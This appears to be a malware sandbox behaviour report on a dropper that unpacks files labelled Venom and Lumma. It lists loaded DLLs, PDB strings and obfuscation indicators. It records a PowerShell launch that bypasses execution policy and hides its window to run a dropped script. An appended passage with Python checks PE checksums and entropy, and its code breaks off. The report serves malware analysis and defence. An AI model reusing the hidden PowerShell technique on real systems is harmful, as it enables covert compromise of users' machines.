Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\2D42.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: System.Xml.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: rust_dave_sideload.pdb source: vm.exe, 00000013.00000002.4123601062.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, lm.exe, 00000014.00000002.3069655853.000000006C888000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 0000001A.00000002.3227475624.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, g2m.dll0.14.dr
Source: Binary string: System.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source: Binary string: BitLockerToGo.pdb source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdb) source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Configuration.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.pdbMZ@ source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source: Binary string: BitLockerToGo.pdbGCTL source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.pdbl source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER250C.tmp.dmp.29.dr
Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000013.00000000.2626820511.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 00000013.00000002.4106639355.0000000000402000.00000002.00000001.01000000.00000013.sdmp, lm.exe, 00000014.00000002.3064617756.0000000000402000.00000002.00000001.01000000.00000014.sdmp, lm.exe, 00000014.00000000.2627426001.0000000000402000.00000002.00000001.01000000.00000014.sdmp, vm.exe, 0000001A.00000000.2764355472.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 0000001A.00000002.3104887965.0000000000402000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: System.Core.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Windows.Forms.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Core.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr

Data Obfuscation

Source: 19.2.vm.exe.4e40000.1.raw.unpack, ClientSocket.cs .Net Code: Invoke System.AppDomain.Load(byte[])
Source: 26.2.vm.exe.4e30000.1.raw.unpack, ClientSocket.cs .Net Code: Invoke System.AppDomain.Load(byte[])
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D64F0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess, 19_2_6C8D64F0
Source: 8EC7.exe.1.dr Static PE information: real checksum: 0x0 should be: 0xf4e19
Source: g2m.dll.14.dr Static PE information: real checksum: 0x0 should be: 0x6caf9
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: real checksum: 0xfa47 should be: 0xafb3
Source: g2m.dll0.14.dr Static PE information: real checksum: 0x0 should be: 0x6caf9
Source: adjijwj.1.dr Static PE information: real checksum: 0xfa47 should be: 0xafb3
Source: EF14.exe.1.dr Static PE information: section name: .xdata
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00403230 push eax; ret 0_2_00403302
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004026FF push ecx; ret 0_2_0040270B
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC51C8 push ds; iretd 10_2_00007FFD9BAC5BDF
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC00BD pushad ; iretd 10_2_00007FFD9BAC00C1
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC0DFE push eax; retf 10_2_00007FFD9BAC0E1D
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC0DD5 push eax; ret 10_2_00007FFD9BAC0DFD
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC0DC0 push eax; ret 10_2_00007FFD9BAC0DFD
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC0D55 push eax; ret 10_2_00007FFD9BAC0DFD
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BBB23E1 push 8B485F90h; iretd 10_2_00007FFD9BBB23E6
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BBB238C push 8B485F90h; iretd 10_2_00007FFD9BBB2391
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB0DFE push eax; retf 12_2_00007FFD9BAB0E1D
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB0DD5 push eax; ret 12_2_00007FFD9BAB0DFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BABF9AD pushad ; iretd 14_2_00007FFD9BABF9B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BABF948 push eax; ret 14_2_00007FFD9BABF951
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BABFFFE push esp; retf 14_2_00007FFD9BABFFFF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAC5038 push eax; iretd 14_2_00007FFD9BAC50F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB3F7C push eax; iretd 14_2_00007FFD9BAB3F9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAC3F1B push ecx; retf 5E39h 14_2_00007FFD9BAC3F5C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB3EF2 push ecx; iretd 14_2_00007FFD9BAB3FFA
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8F63E1 push ecx; ret 19_2_6C8F63F4
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF3D71 push ds; iretd 19_2_05FF3D7E
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF1F93 push eax; iretd 19_2_05FF1FA2
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF1F88 push eax; iretd 19_2_05FF1F92
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF4EE1 push ebp; iretd 19_2_05FF4EEE
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF20FF push ebp; iretd 19_2_05FF210A
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF2089 push esp; iretd 19_2_05FF208A
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF6831 push 6A4405FEh; iretd 19_2_05FF6836
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF201C push ebx; iretd 19_2_05FF202A
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF3B04 push eax; iretd 19_2_05FF3B0E
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C8863E1 push ecx; ret 20_2_6C8863F4
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: section name: .text entropy: 7.062434505591146
Source: adjijwj.1.dr Static PE information: section name: .text entropy: 7.062434505591146
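The five "real checksum ... should be" lines above report a mismatch between IMAGE_OPTIONAL_HEADER.CheckSum and the value the ImageHlp CheckSumMappedFile algorithm yields for the file. A stored 0x0 means the build tooling never filled the field; a wrong non-zero value (0xfa47 stored against 0xafb3 computed for the submitted sample, and again for adjijwj, which shows the same checksum and .text entropy and so is consistent with being a copy of it) means the image was modified after it was linked. The .text entropy of 7.06 bits per byte is the other static signal: ordinary compiled code typically sits a little above 6, and values approaching 8 point to compressed or encrypted content. Neither signal is proof of malice on its own, since the loader only validates the checksum for kernel drivers and a few system DLLs and many legitimate packers raise entropy; they are triage signals. As an added example that is not part of this report or of Joe Sandbox, the following Python reimplements both checks and exercises them on a constructed minimal PE32 image; a real sample would be read from disk instead.

```python
import math
import struct

OPTIONAL_HEADER_CHECKSUM = 0x40   # CheckSum sits 0x40 bytes into IMAGE_OPTIONAL_HEADER (PE32 and PE32+)


def checksum_field_offset(image: bytes) -> int:
    """Return the file offset of IMAGE_OPTIONAL_HEADER.CheckSum."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    return e_lfanew + 4 + 20 + OPTIONAL_HEADER_CHECKSUM   # signature + IMAGE_FILE_HEADER


def compute_checksum(image: bytes, checksum_offset: int) -> int:
    """One's-complement DWORD sum over the whole file, skipping the CheckSum field,
    folded to 16 bits and then added to the file length (the CheckSumMappedFile algorithm)."""
    if checksum_offset % 4:
        raise ValueError("CheckSum field is not DWORD aligned")
    skip = checksum_offset // 4
    padded = image + b"\0" * (-len(image) % 4)        # a trailing partial DWORD is zero-padded
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:                            # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(image)


def verify_checksum(image: bytes):
    """Return (stored, computed, matches) for an in-memory PE image."""
    off = checksum_field_offset(image)
    stored = struct.unpack_from("<I", image, off)[0]
    computed = compute_checksum(image, off)
    return stored, computed, stored == computed


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_sample_pe(stored_checksum: int) -> bytes:
    """Constructed minimal PE32: DOS header, PE signature, COFF header, optional header,
    and one 512-byte maximal-entropy 'section' body. Demonstration data, not a real binary."""
    dos = bytearray(64)
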